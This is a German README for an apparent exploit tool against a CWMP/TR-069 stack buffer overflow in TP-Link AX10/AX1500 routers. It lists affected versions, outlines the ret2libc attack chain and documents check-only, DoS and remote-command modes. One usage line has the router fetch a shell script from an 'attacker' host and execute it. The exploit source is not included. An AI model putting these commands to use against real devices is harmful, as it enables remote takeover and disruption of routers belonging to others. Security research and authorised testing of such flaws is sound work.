
Exploit für TP-Link AX10/AX1500 Stack-Pufferüberlauf in CWMP (TR-069), der Remote-Code-Ausführung via ret2libc mit ASLR-Umgehung ermöglicht. Enthält Check-Only-, DoS- und Befehlsausführungsmodi.
TP-Link AX10/AX1500 CWMP Pufferüberlauf RCE
Stack-basierter Pufferüberlauf in CWMP (TR-069) führt zu Remote-Code-Ausführung.
| Feld | Wert |
|---|---|
| Produkt | TP-Link AX10, AX1500 |
| Betroffen | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (Hoch) |
| Typ | Stack-Pufferüberlauf |
| Vektor | CWMP/TR-069 (Port 7547) |
| Auswirkung | Remote-Code-Ausführung |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
Die Schwachstelle liegt in der cwmp-Prozessverarbeitung von SetParameterValues SOAP-Anfragen. Die Eingabe wird zur Berechnung der Puffergröße ohne Grenzprüfung verwendet.
Ausnutzung:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Keine (verwendet Standardbibliothek)
Nur für autorisierte Sicherheitstests.
| Flagge | Beschreibung | Standard |
|---|
-p, --port | CWMP-Port | 7547 |
-c, --command | Befehl für RCE | keine |
-t, --timeout | Socket-Timeout | 10 |
--dos | Nur DoS-Modus | aus |
--check-only | Prüfen, ob anfällig | aus |